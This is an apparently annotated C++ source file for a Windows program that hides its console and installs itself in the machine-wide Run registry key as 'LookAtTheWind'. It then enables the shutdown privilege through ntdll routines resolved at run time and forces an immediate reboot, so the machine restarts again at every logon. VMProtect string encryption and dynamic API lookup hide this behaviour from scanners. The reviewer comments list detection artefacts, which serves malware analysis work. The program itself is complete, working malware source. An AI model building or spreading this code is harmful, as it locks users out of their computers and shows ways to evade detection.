// Project20.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include "pch.h"
#include <iostream>
#include <Windows.h>
#include <stdio.h>
#include <strsafe.h>
#include <string.h>
#include <Aclapi.h>
#include "VMProtectSDK.h"
#pragma comment(lib, "Advapi32.lib")
#pragma comment(lib, "User32.lib")
// Function-pointer types for two ntdll exports that main() resolves at run time
// with GetProcAddress. Because they are not linked through the import table,
// an import-based scan of the binary will not list them.
typedef long(__fastcall *pfnRtlAdjustPrivilege64)(ULONG, ULONG, ULONG, PVOID);
typedef int(*pfnZwShutdownSystem)(int);
// Filled in by main(); stay NULL until LoadLibrary/GetProcAddress succeed.
pfnRtlAdjustPrivilege64 RtlAdjustPrivilege = NULL;
pfnZwShutdownSystem ZwShutdownSystem = NULL;
// Registers this executable for automatic start at logon by writing a path to
// the machine-wide Run key. The path is assembled from the current working
// directory plus the file-name part of the command line (see the notes below
// on how that part is trimmed). Returns TRUE when the value was written, FALSE
// on any failure. Every string constant goes through VMProtectDecryptString*,
// so neither the key path nor the value name is visible as plain text in the
// binary; on a host the artefact to look for is the value "LookAtTheWind"
// under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
BOOL HandleReg()
{
// VMProtect region marker. The matching VMProtectEnd() at the bottom sits
// after `return TRUE;` and is therefore never reached.
VMProtectBegin("vmp");
LPCWSTR pommandLine = NULL;
WCHAR strPathBuffer[MAX_PATH] = { 0 };
int nLen = 0;
PCHAR pMultiString = NULL;
// Start from the current working directory, not the module's own location, so
// the registered path can differ from where the binary actually resides.
GetCurrentDirectory(MAX_PATH, strPathBuffer);
StringCchCat(strPathBuffer, MAX_PATH, VMProtectDecryptStringW(L"\\"));
pommandLine = GetCommandLine();
// First call sizes the OEM-codepage conversion (lstrlen excludes the NUL,
// hence the +1 on the allocation below).
nLen = WideCharToMultiByte(CP_OEMCP, 0, pommandLine, lstrlen(pommandLine), NULL, 0, NULL, NULL);
pMultiString = new CHAR[nLen + 1];
// NOTE(review): plain `new` throws std::bad_alloc instead of returning NULL,
// so this check can never fire.
if (pMultiString == NULL)
return FALSE;
RtlZeroMemory(pMultiString, nLen + 1);
WideCharToMultiByte(CP_OEMCP, 0, pommandLine, lstrlen(pommandLine), pMultiString, nLen + 1, NULL, NULL);
char *q = strstr(pMultiString, VMProtectDecryptStringA("\\"));
char *temp = NULL;
char buffer[MAX_PATH] = { 0 };
WCHAR strBuffer[MAX_PATH] = { 0 };
// Walk to the last backslash; afterwards `temp` points just past it (the
// file-name part of the command line). If the command line contains no
// backslash at all, `temp` stays NULL and the strlen() below dereferences it.
while (1)
{
if (q == NULL)
break;
q++;
temp = q;
q = strstr(q, VMProtectDecryptStringA("\\"));
}
// The destination size passed here is strlen(temp) - 1, not sizeof(buffer).
// StringCchCopyA copies at most one character fewer than that, so the tail of
// `temp` is trimmed — presumably to drop a closing quote. The exact value that
// ends up in the registry therefore depends on how the command line was
// quoted; check it on a real sample rather than assuming a clean path.
StringCchCopyA(buffer, strlen(temp) - 1, temp);
// Converts the whole MAX_PATH-byte buffer (zero-filled above), so the
// terminator is carried across.
MultiByteToWideChar(CP_OEMCP, 0, buffer, MAX_PATH, strBuffer, MAX_PATH);
StringCchCat(strPathBuffer, MAX_PATH, strBuffer);
HKEY hKey = NULL;
LPCWSTR strSubKeyData = VMProtectDecryptStringW(L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
// Open the machine-wide Run key for writing. Writing under HKLM normally needs
// an elevated token; on failure the function returns without freeing
// pMultiString.
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, strSubKeyData, 0, KEY_QUERY_VALUE | KEY_SET_VALUE, &hKey) != ERROR_SUCCESS)
return FALSE;
// Write the value. The size argument is sizeof(strPathBuffer) (the full
// MAX_PATH * sizeof(WCHAR) bytes), so the stored REG_SZ carries trailing zero
// padding beyond the string. On failure both pMultiString and hKey leak.
if (RegSetKeyValue(hKey, NULL, VMProtectDecryptStringW(L"LookAtTheWind"), REG_SZ, strPathBuffer, sizeof(strPathBuffer)) != ERROR_SUCCESS)
return FALSE;
delete[]pMultiString;
pMultiString = NULL;
RegCloseKey(hKey);
hKey = NULL;
return TRUE;
// Unreachable: placed after the return.
VMProtectEnd();
}
// Entry point. Hides the console window, installs the Run-key entry via
// HandleReg(), then enables the shutdown privilege through RtlAdjustPrivilege
// and forces a reboot through ZwShutdownSystem — both resolved from ntdll at
// run time. The reboot happens with no prompt and regardless of whether the
// persistence step succeeded, so this is the behaviour that a sandbox or
// host-based detection should key on (hidden console, HKLM Run write,
// dynamic ntdll lookups, privilege adjustment, shutdown call).
int main()
{
// VMProtect region marker; the matching VMProtectEnd() below is after
// `return 0;` and never executes.
VMProtectBegin("vmp");
// Hides the first window whose class is "ConsoleWindowClass" (title NULL).
// NOTE(review): FindWindow matches any such window, not necessarily this
// process's own console — verify on the target Windows version.
ShowWindow(FindWindow(VMProtectDecryptStringW(L"ConsoleWindowClass"), NULL), SW_HIDE);
// Return value is ignored: the reboot below proceeds even if the Run-key
// write failed.
HandleReg();
HMODULE hModule = ::LoadLibrary(VMProtectDecryptStringW(L"ntdll.dll"));
if (hModule == NULL)
return 0;
// Dynamic lookups keep both names out of the import table; the export names
// themselves are decrypted at run time.
RtlAdjustPrivilege = (pfnRtlAdjustPrivilege64)GetProcAddress(hModule, VMProtectDecryptStringA("RtlAdjustPrivilege"));
if (RtlAdjustPrivilege == NULL)
return 0;
ZwShutdownSystem = (pfnZwShutdownSystem)GetProcAddress(hModule, VMProtectDecryptStringA("ZwShutdownSystem"));
if (ZwShutdownSystem == NULL)
return 0;
// Query the OS version; only dwPlatformId is used afterwards.
OSVERSIONINFO osvi;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if (GetVersionExW(&osvi) == 0)
return 0;
// Receives the previous enable state from RtlAdjustPrivilege; never read.
DWORD dwReturnval;
if (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT) {
/*
Privilege numbers, from the original author's constant table (written in
易语言/EPL syntax in the source):
  SE_BACKUP_PRIVILEGE   = 17
  SE_RESTORE_PRIVILEGE  = 18
  SE_SHUTDOWN_PRIVILEGE = 19
  SE_DEBUG_PRIVILEGE    = 20
*/
// Enables privilege 19 (SE_SHUTDOWN_PRIVILEGE per the table above) in the
// process token (third argument 0 = process rather than thread, going by the
// publicly known signature of this undocumented routine). The NTSTATUS result
// is not checked, so a failure here — e.g. an unelevated token — is silent.
RtlAdjustPrivilege(19, TRUE, 0, &dwReturnval);
}
// Original comment: 0 = shut down, 1 = reboot, 2 = sleep. Argument 1 requests
// a reboot. NOTE(review): the documented SHUTDOWN_ACTION enum names value 2
// ShutdownPowerOff, not sleep — confirm before relying on that reading.
// Called unconditionally; if it succeeds the lines below may never run.
ZwShutdownSystem(1); //0:关机 1:重启 2:睡眠
FreeLibrary(hModule);
hModule = NULL;
// Runs `pause` via the command processor — waits on a console that was hidden
// above, so the process appears to idle if the shutdown call returned.
system(VMProtectDecryptStringA("pause"));
return 0;
// Unreachable: placed after the return.
VMProtectEnd();
}